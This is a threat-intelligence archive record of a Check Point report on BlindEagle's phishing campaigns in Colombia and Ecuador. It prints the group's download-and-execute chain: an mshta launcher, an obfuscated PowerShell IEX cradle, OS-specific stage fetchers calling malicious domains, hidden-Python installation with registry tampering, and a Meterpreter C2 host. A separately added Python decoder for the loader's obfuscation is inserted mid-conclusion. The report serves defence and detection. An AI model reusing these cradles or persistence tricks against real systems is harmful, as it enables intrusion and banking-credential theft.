{
	"id": "cbd96a70-d240-456c-8d17-52689820f252",
	"created_at": "2026-04-07T15:34:36.869422Z",
	"updated_at": "2026-04-10T03:35:20.379334Z",
	"deleted_at": null,
	"sha1_hash": "b84df3f110b07ff5fc57cff1f79e5b4df1cd0c87",
	"title": "BlindEagle Targeting Ecuador With Sharpened Tools",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 97560,
	"plain_text": "BlindEagle Targeting Ecuador With Sharpened Tools\r\nBy itayc\r\nPublished: 2023-01-05 · Archived: 2026-04-07 15:12:45 UTC\r\nHIGHLIGHTS:\r\nAPT-C-36, also known as Blind Eagle, is a financially motivated threat group that has been launching indiscriminate\r\nattacks against citizens of various countries in South America since at least 2018.\r\nIn a recent campaign targeting Ecuador based organizations, CPR detected a new infection chain that involves a\r\nmore advanced toolset.\r\nThe backdoor chosen for this campaign is typically used by espionage campaigns, which is unusual for this group\r\nACTIVE CAMPAIGNS AGAINST COLOMBIAN TARGETS\r\nFor the last few months, we have been observing the ongoing campaigns orchestrated by Blind Eagle, which have mostly\r\nadhered to the TTPs described above — phishing emails pretending to be from the Colombian government. One typical\r\nexample is an email purportedly from the Ministry of Foreign Affairs, threatening the recipient with issues when leaving the\r\ncountry unless they settle a bureaucratic matter.\r\nSuch emails usually feature either a malicious document or a malicious link, but in this case, the attackers said “why not\r\nboth?” and included both a link and a terse attached PDF directing the unfortunate victim to the exact same link.\r\nIn both cases, the link in question consists of a legitimate link-shortening service URL that geolocates victims and makes\r\nthem communicate with a different “server” depending on the original country ( https://gtly[.]to/QvlFV_zgh ). If the\r\nincoming HTTP request originates from outside Colombia, the server aborts the infection chain, acts innocent and redirects\r\nthe client to the official website of the migration department of the Colombian Ministry of Foreign Affairs.\r\nIf the incoming request seems to arrive from Colombia, the infection chain proceeds as scheduled. The server responds to\r\nthe client with a file for download. 
This is a malware executable hosted on the file-sharing service MediaFire. The file is compressed, similarly to a ZIP file, using the LHA algorithm. It is password-protected, making it impervious to naive static analysis and even naive sandbox emulation. The password is found both in the email and in the attached PDF.\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 1 of 9\n\nThe malicious executable inside the LHA archive is written in .NET and packed. When unpacked, a modified sample of QuasarRAT is revealed.\r\nQuasarRAT is an open-source trojan whose code is available from multiple sources such as GitHub. The (probably Spanish-speaking) actors behind this APT group have added some extra capabilities over the last few years, which are easy to spot thanks to the Spanish names of functions and variables. This process, by which threat actors abuse access to malware source code and each create their own special version of that malware, is sadly not without precedent in the security landscape and always makes us heave a sad sigh when we encounter it.\r\nAlthough QuasarRAT is not a dedicated banking Trojan, the sample’s embedded strings show that the group’s main goal in this campaign was to intercept victims’ access to their bank accounts.\r\nThis is the complete list of targeted entities:\r\nBancolombia Sucursal Virtual Personas\r\nSucursal_Virtual_Empresas_\r\nPortal Empresarial Davivienda\r\nBBVA Net Cash\r\nColpatria – Banca Empresas\r\nbancaempresas.bancocajasocial.com\r\nEmpresarial Banco de Bogota\r\nconexionenlinea.bancodebogota.com\r\nAV Villas – Banca Empresarial\r\nBancoomeva Banca Empresarial\r\nTRANSUNION\r\nBanco Popular\r\nportalpymes\r\nBlockchain\r\nDashboardDavivienda\r\nSome extra features added to Quasar by this group are a function named “ActivarRDP” (activate RDP) and two more to activate and deactivate the system
Proxy, along with a few more commands that incur technical debt by impudently disregarding Quasar’s conventions for function naming and parameter order.\r\nA BETTER CAMPAIGN FEATURING NEWER TOOLS\r\nOne specific sample caught our attention as it was related to a government institution from Ecuador rather than Colombia. While Blind Eagle attacking Ecuador is not unprecedented, it is still unusual. Similarly to the campaign described above, the geo-filter server in this campaign redirects requests from outside Ecuador and Colombia to the website of the Ecuadorian Internal Revenue Service.\r\nIf contacted from Colombia or Ecuador, the file downloaded from MediaFire is a password-protected RAR archive. But instead of a single executable consisting of some packed RAT, the infection chain in this case is much more elaborate.\r\nInside the RAR archive there is an executable built with PyInstaller from a rather simplistic Python 3.10 script. This code just adds one more stage to the infection chain:\r\nimport os\r\nimport subprocess\r\nimport ctypes\r\nctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)\r\nwsx = 'mshta https://gtly[.]to/dGBeBqd8z'\r\nos.system(wsx)\r\n
mshta is a utility that executes Microsoft HTML Applications, and the attackers abuse it here to download and execute the next stage, which contains VBScript code embedded in an HTML page.\r\n<script language=\"VBScript\">\r\nCreateObject(\"Wscript.Shell\").run\"powershell.exe -noexit \"\"$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''https://[malicious domain]/wins''))';$a3=\"\"$a1,$a2\"\";IEX(-join $a3)\"\"\", 0, true\r\nself.close\r\n</script>\r\nNote that the string \"downloadstring\" never appears intact in this stage: it is split across $a1 and $a2 and only reassembled at runtime by -join, a cheap way to defeat naive keyword signatures.\r\nUsually campaigns by Blind Eagle abuse legitimate file-sharing services such as MediaFire or free dynamic DNS domains like *.linkpc.net; this case is different, and the next stage is hosted at the malicious domain upxsystems[.]com.\r\nThis stage in turn downloads and executes yet another stage, a PowerShell script:\r\nfunction StartA{\r\n[version]$OSVersion = [Environment]::OSVersion.Version\r\nIf ($OSVersion -gt \"10.0\") {\r\niex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w10/0\")\r\n} ElseIf ($OSVersion -gt \"6.3\") {\r\niex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w8/0\")\r\n}
ElseIf ($OSVersion -gt \"6.2\") {\r\niex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w8/0\")\r\n} ElseIf ($OSVersion -gt \"6.1\") {\r\niex (new-object net.webclient).downloadstring(\"http://[malicious domain]/covidV22/ini/w7/0\")\r\n}\r\n}\r\nStartA\r\nThe above PowerShell checks the OS version and downloads the matching OS-specific PowerShell stage (Windows 10, Windows 8/8.1 or Windows 7; note that the Windows 7 stage is fetched over plain HTTP).
This additional OS-specific PowerShell checks for installed AV tools and behaves differently based on its findings. The main difference between these stages lies in the code that tries to disable the installed security solution (for example Windows Defender); in all cases, regardless of which security solution is installed, the stage then downloads a version of Python suitable for the target OS and installs it (the 32-bit branch is shown below; the rest of the function is elided):\r\nFunction PY(){\r\nif([System.IntPtr]::Size -eq 4)\r\n{\r\n$progressPreference = 'silentlyContinue'\r\n$url = \"https://www.python.org/ftp/python/3.9.9/python-3.9.9-embed-win32.zip\"\r\n$output = \"$env:PUBLIC\\py.zip\"\r\n$start_time = Get-Date\r\n$wc = New-Object System.Net.WebClient\r\n$wc.DownloadFile($url, $output)\r\nNew-Item \"$env:PUBLIC\\py\" -type directory\r\n$FILE=Get-Item \"$env:PUBLIC\\py\" -Force\r\n$FILE.attributes='Hidden'\r\n$shell = New-Object -ComObject Shell.Application\r\n$zip = $shell.Namespace(\"$env:PUBLIC\\py.zip\")\r\n$items = $zip.items()\r\n$shell.Namespace(\"$env:PUBLIC\\py\").CopyHere($items, 1556)\r\nstart-sleep -Seconds 2;\r\nRemove-Item \"$env:PUBLIC\\py.zip\"\r\nRemove-Item \"$env:USERPROFILE\\PUBLIC\\Local\\Microsoft\\WindowsApps\\*.*\" -Recurse -Force\r\nRemove-Item \"$env:USERPROFILE\\AppData\\Local\\Microsoft\\WindowsApps\\*.*\" -Recurse -Force\r\nsetx PATH \"$env:path;$env:PUBLIC\\py\"\r\nNew-Item -Path HKCU:\\Software\\Classes\\Applications\\python.exe\\shell\\open\\command\\ -Value \"\"\"$env:PUBLIC\\py\\python.exe\"\" \"\"%1\"\"\" -Force\r\nSet-ItemProperty -path 'hkcu:\\Software\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache\\'
-name \"$env:PUBLIC\\py\\python.exe.ApplicationCompany\" -value \"Python Software Foundation\"\r\nSet-ItemProperty -path 'hkcu:\\Software\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache\\' -name \"$env:PUBLIC\\py\\python.exe.FriendlyAppName\" -value \"Python\"\r\n}\r\n....\r\nTwo details of this function are worth noting. The Remove-Item lines wipe the user’s WindowsApps folder, which is where Windows keeps its App Execution Alias stubs (including the python.exe stub that redirects to the Microsoft Store), so that the interpreter dropped into the hidden %PUBLIC%\\py folder is the one resolved through PATH. The MuiCache entries make that interpreter show up as “Python” from “Python Software Foundation” in shell UI, a cosmetic touch aimed at anyone eyeballing the running process.\r\n
It will then download two scripts named mp.py and ByAV2.py, store them in the user’s %Public% folder, and create a scheduled task for them that runs every 10 minutes.
For Windows 7 the task is created by downloading an XML task definition from the C2 upxsystems[.]com, while for Windows 8, 8.1 and 10 the malware creates the task using the New-ScheduledTask* cmdlets.\r\nIn the case of Windows 7, the task is preconfigured to run as SYSTEM and contains the following description:\r\n<Description> Mantiene actualizado tu software de Google. Si esta tarea se desactiva o se detiene, tu software de Google no se mantendrá actualizado, lo que implica que las vulnerabilidades de seguridad que puedan aparecer no podrán arreglarse y es posible que algunas funciones no anden. Esta tarea se desinstala automáticamente si ningún software de Google la utiliza. </Description>\r\nIt is written in the variety of Spanish commonly spoken in the target countries, as can be seen for example in the use of “es posible que algunas funciones no anden” instead of “no se ejecuten” or another variant more common in other regions.\r\nThe full description can be translated as:\r\n“Keeps your Google software up to date. If this task is disabled or stopped, your Google software will not be kept up to date, which means that security vulnerabilities that may appear cannot be fixed and some features may not work.
This task is automatically uninstalled if no Google software uses it.”\r\nAfter downloading the Python scripts and adding persistence, the malware tries to kill all processes related to the infection.\r\nBoth downloaded scripts are obfuscated using a homebrew encoding that consists of base64 applied 5 times over (we will never, ever, tire of responding to such design choices with “known to be 5 times as secure as vanilla base64”). After decoding these strings in each script we obtain two different types of Meterpreter samples.\r\nByAV2.py\r\nThis code is an in-memory loader written in Python, which loads and runs a regular Meterpreter sample in DLL format that uses tcp://systemwin.linkpc[.]net:443 as its C2 server.\r\nPython has a built-in PRNG, and in principle nothing stops you from constructing a stream cipher based on it, which is what the malware authors do here. The embedded DLL is decrypted using this makeshift “randint stream cipher” with an embedded key (in this construction the key is used as the seed that primes the random library). In the grand tradition of cryptography used inside malware purely to obfuscate buffers with a hardcoded key, the question of how secure this makeshift cipher is has exactly zero consequences: anyone holding the script holds the seed, and the keystream is fully reproducible.\r\nmp.py\r\nThe second script is essentially another Meterpreter sample — this time a version developed entirely in Python and using the same C2 server. We can only speculate on why the server was configured to drop the same payload, with the same C2 server, written in two different languages; possibly one of the samples acts as a plan B in case the other gets detected by some antivirus solution and removed.\r\nCONCLUSION\r\nBlind Eagle is a strange bird among APT groups.
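The two deobfuscation steps described above for ByAV2.py, as a worked example added here (this is not code from the Check Point write-up nor from the malware itself): peel the nested base64 layers, regenerate the keystream by seeding Python's random module with the embedded key, XOR the payload and check that a PE header came out. The XOR combiner, the randint(0, 255) byte range, the five-layer depth, the placeholder key 'clave-secreta' and the fake DLL bytes are assumptions of this example; the real loader's exact parameters are not given in the write-up.

```python
# Added worked example (not code from the Check Point write-up or from the
# malware). It reproduces the two deobfuscation steps described for ByAV2.py:
# peeling nested base64 layers, then reversing a stream cipher whose keystream
# comes from seeding Python's random module. The XOR combiner, the
# randint(0, 255) range, the 5-layer depth, the key 'clave-secreta' and the
# fake DLL are assumptions for the demonstration only.
import base64
import binascii
import random
import struct

HYPOTHETICAL_KEY = 'clave-secreta'   # stands in for the key embedded in the script
LAYERS_IN_SAMPLE = 5                  # 'base64 repeated 5 times'


def peel_base64(blob, max_layers=16):
    '''Strip nested base64 layers until the data stops being valid base64.

    Returns (payload, layers_removed). validate=True makes the decoder refuse
    anything outside the base64 alphabet, so binary output (an encrypted DLL,
    a PE header, high bytes) ends the loop instead of being mis-decoded.
    '''
    data = bytes(blob)
    layers = 0
    while layers < max_layers:
        candidate = data.strip()
        if not candidate or len(candidate) % 4:
            break
        try:
            data = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            break
        layers += 1
    return data, layers


def randint_keystream(key, length):
    '''Keystream as the malware derives it: the key seeds the PRNG and each
    byte is one randint() draw. Same key, same stream, every time.'''
    rng = random.Random(key)
    return bytes(rng.randint(0, 255) for _ in range(length))


def xor_crypt(data, key):
    '''Symmetric: encrypt and decrypt are the same XOR against the keystream.'''
    stream = randint_keystream(key, len(data))
    return bytes(a ^ b for a, b in zip(data, stream))


def looks_like_pe(data):
    '''Sanity check an analyst applies after decryption: MZ stub plus a PE
    signature at e_lfanew (the DWORD at offset 0x3c).'''
    if len(data) < 0x40 or data[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', data, 0x3c)[0]
    return data[e_lfanew:e_lfanew + 4] == bytes([0x50, 0x45, 0, 0])


def recover_dll(blob, key):
    '''Full pipeline: peel base64, decrypt, verify. None if the key is wrong.'''
    encrypted, layers = peel_base64(blob)
    candidate = xor_crypt(encrypted, key)
    if not looks_like_pe(candidate):
        return None
    return candidate, layers


# --- constructed sample standing in for the real loader's embedded blob ------
def fake_dll():
    '''A 0x40-byte DOS header (MZ, e_lfanew = 0x40), a PE signature and some
    high-byte filler. Not a real DLL, just enough structure for looks_like_pe().'''
    header = bytearray(0x40)
    header[:2] = b'MZ'
    struct.pack_into('<I', header, 0x3c, 0x40)
    return bytes(header) + bytes([0x50, 0x45, 0, 0]) + bytes(range(0x80, 0x100))


def build_sample(key=HYPOTHETICAL_KEY, layers=LAYERS_IN_SAMPLE):
    '''Encrypt the fake DLL and wrap it in the requested number of base64
    layers, the way the obfuscated script embeds its payload.'''
    blob = xor_crypt(fake_dll(), key)
    for _ in range(layers):
        blob = base64.b64encode(blob)
    return blob


if __name__ == '__main__':
    sample = build_sample()
    dll, layers = recover_dll(sample, HYPOTHETICAL_KEY)
    print('layers peeled:', layers, '| PE recovered:', dll == fake_dll())
    print('wrong key yields a PE:', recover_dll(sample, 'otra-clave') is not None)
```

In practice you would feed peel_base64() the string literal pulled out of the obfuscated .py and seed xor_crypt() with whatever value the script passes to random.seed(). The point behind the 'five times as secure' joke is visible in recover_dll(): every input needed to undo the obfuscation is present in the script itself, so the decoder needs no key search at all.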
Judging by its toolset and usual operations, it is clearly more interested in cybercrime and monetary gain than in espionage; however, unlike most such groups, which attack the entire world indiscriminately, Blind Eagle has a very narrow geographical focus, most of the time limited to a single country. This latest campaign targeting Ecuador highlights how, over the last few years, Blind Eagle has matured as a threat — refining its tools, adding features to existing code bases, and experimenting with elaborate infection chains and “Living off the Land” techniques, as seen with the abuse of mshta. If what we’ve seen is any indication, this group is worth keeping an eye on so that victims aren’t blindsided by whatever clever thing it tries next.\r\nCheck Point’s anti-phishing solutions for Office 365 & G Suite analyze all historical emails in order to determine prior trust relations between sender and receiver, increasing the likelihood of identifying user impersonation or fraudulent messages.
Artificial Intelligence (AI) and Indicators of Compromise (IoCs) seen in the past train the Harmony Email & Office platform on what to look for in complex zero-day phishing attacks.\r\nIOCs\r\n8e864940a97206705b29e645a2c2402c2192858357205213567838443572f564\r\n2702ea04dcbbbc3341eeffb494b692e15a50fbd264b1d676b56242aae3dd9001\r\nf80eb2fcefb648f5449c618e83c4261f977b18b979aacac2b318a47e99c19f64\r\n68af317ffde8639edf2562481912161cf398f0edba6e06745d90c1359554c76e\r\n61685ea4dc4ca4d01e0513d5e23ee04fc9758d6b189325b34d5b16da254cc9f4\r\nhttps://www.mediafire[.]com/file/cfnw8rwufptk5jz/migracioncolombiaprocesopendienteid2036521045875referenciawwwmigraciongovco.LHA/\r\nhttps://gtly[.]to/QvlFV_zgh\r\nhttps://gtly[.]to/cuOv3gNDi\r\nhttps://gtly[.]to/dGBeBqd8z\r\nlaminascol[.]linkpc[.]net\r\nsystemwin[.]linkpc[.]net\r\nupxsystems[.]com\r\nc63d15fe69a76186e4049960337d8c04c6230e4c2d3d3164d3531674f5f74cdf\r\n353406209dea860decac0363d590096e2a8717dd37d6b4d8b0272b02ad82472e\r\na03259900d4b095d7494944c50d24115c99c54f3c930bea08a43a8f0a1da5a2e\r\n46addee80c4c882b8a6903cced9b6c0130ec327ae8a59c5946bb954ccea64a12\r\nc067869ac346d007a17e2e91c1e04ca0f980e8e9c4fd5c7baa0cb0cc2398fe59\r\n10fd1b81c5774c1cc6c00cc06b3ed181b2d78191c58b8e9b54fa302e4990b13d\r\nc4ff3fb6a02ca0e51464b1ba161c0a7387b405c78ead528a645d08ad3e696b12\r\nac1ea54f35fe9107af1aef370e4de4dc504c8523ddaae10d95beae5a3bf67716\r\nSource: https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/"
	],
	"report_names": [
		"blindeagle-targeting-ecuador-with-sharpened-tools"
	],
	"threat_actors": [
		{
			"id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813",
			"created_at": "2022-10-25T15:50:23.688973Z",
			"updated_at": "2026-04-10T02:00:05.390055Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"APT-C-36",
				"Blind Eagle"
			],
			"source_name": "MITRE:APT-C-36",
			"tools": [
				"Imminent Monitor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "be597b07-0cde-47bc-80c3-790a8df34af4",
			"created_at": "2022-10-25T16:07:23.407484Z",
			"updated_at": "2026-04-10T02:00:04.58656Z",
			"deleted_at": null,
			"main_name": "Blind Eagle",
			"aliases": [
				"APT-C-36",
				"APT-Q-98",
				"AguilaCiega",
				"G0099"
			],
			"source_name": "ETDA:Blind Eagle",
			"tools": [
				"AsyncRAT",
				"BitRAT",
				"Bladabindi",
				"BlotchyQuasar",
				"Imminent Monitor",
				"Imminent Monitor RAT",
				"Jorik",
				"LimeRAT",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Socmer",
				"Warzone",
				"Warzone RAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bd43391b-b835-4cb3-839a-d830aa1a3410",
			"created_at": "2023-01-06T13:46:38.925525Z",
			"updated_at": "2026-04-10T02:00:03.147197Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"Blind Eagle"
			],
			"source_name": "MISPGALAXY:APT-C-36",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775576076,
	"ts_updated_at": 1775792120,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b84df3f110b07ff5fc57cff1f79e5b4df1cd0c87.pdf",
		"text": "https://archive.orkl.eu/b84df3f110b07ff5fc57cff1f79e5b4df1cd0c87.txt",
		"img": "https://archive.orkl.eu/b84df3f110b07ff5fc57cff1f79e5b4df1cd0c87.jpg"
	}
}